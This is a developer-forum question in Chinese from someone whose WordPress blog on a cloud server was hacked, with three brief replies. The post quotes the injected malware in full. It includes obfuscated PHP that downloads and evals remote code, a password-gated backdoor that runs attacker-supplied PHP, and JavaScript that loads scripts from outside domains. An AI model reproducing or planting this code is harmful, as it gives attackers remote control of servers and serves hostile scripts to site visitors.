开发者社区> 问答> 正文

ECS上的网站为啥被异常篡改了?

最近遇到一个很奇怪的事情:

搭建在ECS上基于WordPress的个人博客网站被异常篡改了!

所有的phphtml以及js全被改了!!!

数据库中博客的用户列表也被添加了两个不知道哪来的账户。。。

哪位大神知道这是啥原因,要咋样解决不?

具体被篡改的内容如下↓


  • 所有的index.html以及部分PHP文件被添加若干此代码:
<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>
<script type='text/javascript' src='https://stat.trackstatisticsss.com/stm?v=l6.0.0'></script><script type='text/javascript' async=true src='https://ws.stivenfernando.com/stm?v=l6.0.0'></script>
  • 部分的PHP文件中被添加此行代码(共1行)在开头:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include(chr(104).chr(116).chr(104).chr(116));@unlink(chr(104).chr(116).chr(104).chr(116)); ?><?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110); 	$n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; 	$z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); 	$z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); 	$z3 = $b2($_REQUEST[chr(100).chr(49)]); 	@$n3($a,$z2); 	@include($a);@unlink($a); 	$a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; 	@$n3($a,$z2); 	@include($a);@unlink($a);die();  } ?><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(119).chr(115).chr(46).chr(115).chr(116).chr(105).chr(118).chr(101).chr(110).chr(102).chr(101).chr(114).chr(110).chr(97).chr(110).chr(100).chr(111).chr(46).chr(99).chr(111).chr(109).chr(47).chr(107).chr(106).chr(46).chr(116).chr(120).chr(116))); eval($b); ?><?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110); 	$n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; 	$z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); 	$z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); 	$z3 = $b2($_REQUEST[chr(100).chr(49)]); 	@$n3($a,$z2); 	@include($a);@unlink($a); 	$a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; 	@$n3($a,$z2); 	@include($a);@unlink($a);die();  } ?>
  • 部分的PHPHTML文件中被添加此行代码(共1行)在</head>标签前:
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
  • 部分的PHPHTML文件中被添加此行代码(共1行)在<body>标签前:
<script type='text/javascript' async=true src='https://ws.stivenfernando.com/stm?v=l6.0.0'></script><script type='text/javascript' src='https://stat.trackstatisticsss.com/stm?v=l6.0.0'></script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script><script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>
<body>	<script type='text/javascript' async=true src='https://ws.stivenfernando.com/stm?v=l6.0.0'></script><script type='text/javascript' src='https://stat.trackstatisticsss.com/stm?v=l6.0.0'></script>
  • 所有的JS文件前22行被添加如下代码(共22行):
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();var mndfhghjf = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,103,46,106,115); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
}var hjt689ig9 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61,52,52,52); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
}var gfhfghfhfgj = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,50,46,48,46,48); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
}
  • 另外在有index.html文件的目录下增加了l1.logdebugs.log两个文件,其内容都是类似这样一行时间戳:
1588443598
  • 另外在日志文件中产生了如下记录:

1.png

2.png

展开
收起
covear 2020-05-25 17:19:02 1213 0
3 条回答
写回答
取消 提交回答
  • 我这啥也没有为啥要黑我呢

    2020-05-25 21:17:31
    赞同 展开评论 打赏
  • 被攻击了,如果有用到开源的东西,尽量升级到最新版。

    2020-05-25 17:54:02
    赞同 展开评论 打赏
  • 技术架构师 阿里云开发者社区技术专家博主 CSDN签约专栏技术博主 掘金签约技术博主 云安全联盟专家 众多开源代码库Commiter

    被黑了啊。

    2020-05-25 17:33:13
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
如何运维千台以上游戏云服务器 立即下载
网站/服务器取证 实践与挑战 立即下载
ECS计算与存储分离架构实践 立即下载